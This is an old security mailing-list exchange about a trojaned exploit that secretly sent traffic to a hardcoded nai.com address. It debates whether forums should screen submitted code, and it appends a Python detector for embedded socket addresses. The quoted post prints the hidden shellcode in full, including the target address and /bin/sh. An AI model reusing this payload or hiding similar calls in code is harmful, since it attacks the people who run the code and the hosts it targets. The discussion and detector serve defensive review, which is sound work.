Although that is a great idea in general, it would not have helped in this
case. The ruse was very well hidden and an ASCII inspection would not
have revealed the nai.com address.

I think forums like Bugtraq *should* post exploit code that is submitted,
so that other experts in the community could inspect the code and make
their own judgements. I personally think it's asking too much of a
moderator to get bogged down in source code review for each post - that's
what our community is for. Perhaps a better solution is to post a
*reminder* at the top of messages containing code that the contents are
not from SecurityFocus and that one should always use caution when
playing with unknown code.

Others will probably feel even more Darwinian about the matter, as there
is usually very little sympathy for script kiddies.

Max

On Thu, 1 Feb 2001, Mark wrote:
> Hi,
>
> It's ok for those of us with local tools but I suggest someone implement a
> cgi script on a site to take a pasted block of hex code like the one below
> and convert any values in the printable range to their equivalent ASCII
> character. The people at securityfocus could use it before approving.
> (Until someone publishes obfuscation techniques).
>
> Cheers,
> Mark.
>
> >\xa1\x45\x03\x96 == 161.69.3.150 == dns1.nai.com
>
> >>"\xeb\x34\x5e\xbb\x01\x00\x00\x00\x89\xf1\xb8\x66\x00\x00\x00\xcd"
> >>"\x80\x89\x46\x14\x8d\x46\x30\x89\x46\x18\x31\xc0\x89\x46\x20\x8d"
> >>"\x46\x0c\x89\x46\x24\xb8\x66\x00\x00\x00\xbb\x0b\x00\x00\x00\x8d"
> >>"\x4e\x14\xcd\x80\xeb\xef\xe8\xc7\xff\xff\xff\x02\x00\x00\x00\x02"
> >>"\x00\x00\x00\x11\x00\x00\x00\x02\x00\x00\x35\xa1\x45\x03\x96\xff"
> >>"\xff\xff\xff\xef\xff\xff\xff\x00\x04\x00\x00\x00\x00\x00\x00\x02"
> >>"\x5f\x9a\x80\x10\x00\x00\x00/bin/sh\0";
> >
>
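An added example, not part of either message: a reviewer-side check that decodes a pasted C string literal and compares the printable-ASCII view Mark proposes with a scan for an embedded IPv4 socket address, which is what exposes the address here. The function names are hypothetical, the sample is two lines copied from the quoted post, and the scan assumes the Linux/x86 `sockaddr_in` layout (little-endian family, network-order port, four address bytes).

```python
import re
import struct

# Two lines copied from the quoted post: the one holding the address
# and the one holding the only readable string.
SAMPLE = r'''
"\x00\x00\x00\x11\x00\x00\x00\x02\x00\x00\x35\xa1\x45\x03\x96\xff"
"\x5f\x9a\x80\x10\x00\x00\x00/bin/sh\0";
'''

_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')
_TOKEN = re.compile(r'\\x([0-9a-fA-F]{2})|\\([0-7]{1,3})|(.)', re.S)
AF_INET = 2  # address family value used by Linux and the BSDs


def decode_c_string(text):
    """Turn the "..." literals in pasted C source into raw bytes.
    Handles \\xNN and octal escapes; other characters are kept as-is."""
    out = bytearray()
    for literal in _LITERAL.findall(text):
        for hx, octal, ch in _TOKEN.findall(literal):
            if hx:
                out.append(int(hx, 16))
            elif octal:
                out.append(int(octal, 8) & 0xFF)
            else:
                out += ch.encode("latin-1", errors="replace")
    return bytes(out)


def printable_view(data):
    """The proposed ASCII inspection: printable bytes shown, the rest as dots."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data)


def find_sockaddr_in(data):
    """Report every offset that parses as an AF_INET sockaddr_in with a
    non-zero port, as (offset, dotted-quad address, port)."""
    hits = []
    for i in range(len(data) - 7):
        (family,) = struct.unpack_from("<H", data, i)
        (port,) = struct.unpack_from(">H", data, i + 2)
        if family == AF_INET and port != 0:
            addr = ".".join(str(b) for b in data[i + 4:i + 8])
            hits.append((i, addr, port))
    return hits


if __name__ == "__main__":
    blob = decode_c_string(SAMPLE)
    print(printable_view(blob))
    for offset, addr, port in find_sockaddr_in(blob):
        print(f"offset {offset}: {addr} port {port}")
```

The ASCII view shows `/bin/sh` but nothing resembling an address, while the structure scan reports the destination and port; any hit is a candidate to resolve and investigate before the code is run anywhere.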